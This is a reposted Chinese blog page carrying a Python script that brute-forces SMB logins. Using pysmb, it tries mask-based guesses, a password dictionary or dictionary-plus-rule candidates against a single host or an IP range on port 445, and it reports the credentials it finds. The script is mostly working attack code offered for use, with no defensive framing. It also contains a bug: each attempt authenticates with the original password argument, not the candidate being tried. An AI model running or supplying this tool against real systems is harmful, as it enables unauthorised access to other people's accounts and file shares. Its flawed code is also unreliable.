ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

smb爆破/脚本

2021-11-25 18:33:58  阅读:19  来源: 互联网

标签:脚本 爆破 self list param host password data smb


import argparse
import json
import string
import threading
import time
from decimal import Decimal

from smb.SMBConnection import SMBConnection
password.json位置  https://www.cnblogs.com/hudieren/p/15604059.html
password_rule.json位置  https://www.cnblogs.com/hudieren/p/15604066.html

 

class SmbScan:
    classify_list = {
        '1': '暴力破解',
        '2': '字典',
        '3': '字典+规则集',
    }

    def __init__(self, classify, host, port, username, password, timeout=0):
        """
        :param classify: 种类(暴力破解,字典,字典+规则集)
        :param host: 地址(eg:192.168.100.115)
        :param port: 端口
        :param username: 用户名
        :param password: 部分密码(eg:1、`1qaz??`   2、`???`)[问号为不知道的密码,密码可能几位写几位问号]
        :param new_password: 最终正确密码
        :param password_name: 常用密码文件路径
        :param password_list: 可能密码列表
        :param max_threads_number: 最大线程数
        :param max_threads: 限制线程的最大数量
        """
        self.classify = classify
        self.host = host
        self.port = port
        self.username = username
        self.password = password
        self.timeout = timeout
        self.new_password = None
        self.password_name = 'password.json'
        self.password_list = self.get_password()
        self.max_threads_number = 6
        self.max_threads = threading.Semaphore(self.max_threads_number)  # 限制线程的最大数量为4个

    def __violence(self, charsetString, password, length, data=None):
        """
        暴力破解
        :param charsetString: 字符集
        :param password: 密码
        :param length: `?`共有多少个
        :param data: 最终返回的结果
        :return:
        """
        if data is None:
            data = []
        new_data = []
        if len(data) == 0:
            new_data = [password.replace('?', i, 1) for i in charsetString]
        else:
            for i in data:
                for j in charsetString:
                    new_data.append(i.replace('?', j, 1))
        length -= 1
        if length == 0:
            return new_data
        else:
            return self.__violence(charsetString, password, length, new_data)

    def __gather(self):
        """
        密码集合
        :return:
        """
        with open(self.password_name, 'r', encoding='utf-8') as r:
            data = json.loads(r.read())
        return data

    def get_password(self):
        """
        获取可能的密码
        :return: 可能的密码列表
        """
        password_list = []
        charsetString = string.digits + string.ascii_letters + string.punctuation
        length = self.password.count('?')
        if self.classify == '1':
            if length > 0:
                password_list = self.__violence(charsetString, self.password, length)
            else:
                password_list.append(self.password)
        elif self.classify == '2':
            password_list = self.__gather()
        elif self.classify == '3':
            data = self.__gather()
            pwd_list = self.password.split('?')
            data = [d for d in data if len(d) == len(self.password)]
            password_list = []
            for d in data:
                for pwd in pwd_list:
                    if pwd not in d:
                        break
                else:
                    password_list.append(d)
        return password_list

    def connect(self, password):
        with self.max_threads:
            samba = SMBConnection(self.username, self.password, '', '', use_ntlm_v2=True)
            samba.connect(self.host, self.port, timeout=10)
            status = samba.auth_result
            samba.close()
            if status:
                self.new_password = password
                print('密码正确:{}'.format(password))
            else:
                print('密码错误:{}'.format(password))
        time.sleep(self.timeout)

    def run(self):
        password_threads = []
        for password in self.password_list:
            print(password)
            thread = threading.Thread(target=self.connect, args=(password,))
            password_threads.append(thread)
        for thread in password_threads:
            if self.new_password:
                break
            else:
                thread.start()
        for thread in password_threads:
            if self.new_password:
                break
            else:
                thread.join()
        return self.new_password


def opt():
    parser = argparse.ArgumentParser(description='命令行中传入命令')
    parser.add_argument('-choice', required=True, help='<1:暴力破解;2:字典;3:字典+规则集>')
    parser.add_argument('-host', required=True, help='<host(主机)>')
    parser.add_argument('-port', type=int, help='<port(端口)>', default=445)
    parser.add_argument('-username', required=True, help='<username(用户名)>')
    parser.add_argument('-password', required=True, help='<password(密码)>')
    parser.add_argument('-timeout', type=int, help='<timeout(间隔时间)>', default=0)
    return parser.parse_args()


def get_host(host):
    host_list = []
    if '-' in host:
        h = host.split('-')
        left_host = h[0]
        left_host_list = left_host.split('.')
        right_host = h[1]
        right_host_list = right_host.split('.')
        for i in range(int(left_host_list[-1]), int(right_host_list[-1]) + 1):
            d = left_host_list[:3] + [str(i)]
            host_list.append('.'.join(d))
    elif '*' in host:
        rule = {
            '0': {'m': 1, 'n': 255 + 1},
            '1': {'m': 0, 'n': 99 + 1},
            '2': {'m': 0, 'n': 9 + 1},
        }
        h = host.split('.')
        r = h[-1].split('*')[0]
        for i in range(rule['{}'.format(len(r))]['m'], rule['{}'.format(len(r))]['n']):
            d = h[:3] + ['{}{}'.format(r, i)]
            host_list.append('.'.join(d))
    else:
        host_list.append(host)
    return host_list


def main(flag=False, **kwargs):
    start_time = Decimal(time.time()).quantize(Decimal("0.00"))
    if flag:
        classify = kwargs.get('classify')
        host = kwargs.get('host')
        port = kwargs.get('port')
        username = kwargs.get('username')
        password = kwargs.get('password')
        timeout = kwargs.get('timeout')
        if not timeout:
            timeout = 0
        host_list = get_host(host)
    else:
        args = opt()
        classify = args.choice
        port = args.port
        p = (445, 139)
        username = args.username
        password = args.password
        timeout = args.timeout
        host_list = get_host(args.host)
    pwd = []
    for host in host_list:
        password = SmbScan(classify, host, port, username, password, timeout=timeout).run()
        d = {
            'host': host,
            'port': port,
            'username': username,
            'password': password,
        }
        pwd.append(d)
    end_time = Decimal(time.time()).quantize(Decimal("0.00"))
    print('结果为:\n{},\n用时:{}s'.format(pwd, end_time - start_time))
    return {'result': pwd, 'hold_time': '{}s'.format(end_time - start_time)}


if __name__ == '__main__':
    main()

 

标签:脚本,爆破,self,list,param,host,password,data,smb
来源: https://www.cnblogs.com/hudieren/p/15604030.html

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有